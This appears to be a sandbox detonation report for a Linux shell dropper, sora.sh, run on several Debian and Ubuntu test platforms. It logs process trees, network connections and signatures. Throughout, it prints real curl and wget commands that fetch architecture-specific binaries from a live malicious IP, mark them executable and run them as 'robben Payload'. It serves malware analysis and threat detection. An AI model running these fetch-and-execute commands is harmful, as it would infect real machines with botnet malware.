[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-11 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:20

Platform

debian12-mipsel-20240221-en

Max time kernel

48s

Max time network

53s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-logrotate.service-vLtvov systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-1 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:31

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

152s

Max time network

571s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 canonical-lgw01.cdn.snapcraftcontent.com udp
US 8.8.8.8:53 canonical-lgw01.cdn.snapcraftcontent.com udp
GB 185.125.190.26:443 canonical-lgw01.cdn.snapcraftcontent.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 1.1.1.1:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 1.1.1.1:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 1.1.1.1:53 canonical-lgw01.cdn.snapcraftcontent.com udp
US 1.1.1.1:53 canonical-lgw01.cdn.snapcraftcontent.com udp
GB 185.125.190.27:443 canonical-lgw01.cdn.snapcraftcontent.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 1.1.1.1:53 _http._tcp.se.archive.ubuntu.com udp
US 1.1.1.1:53 _http._tcp.security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
GB 185.125.190.83:80 security.ubuntu.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:22

Platform

debian9-armhf-20240611-en

Max time kernel

98s

Max time network

126s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
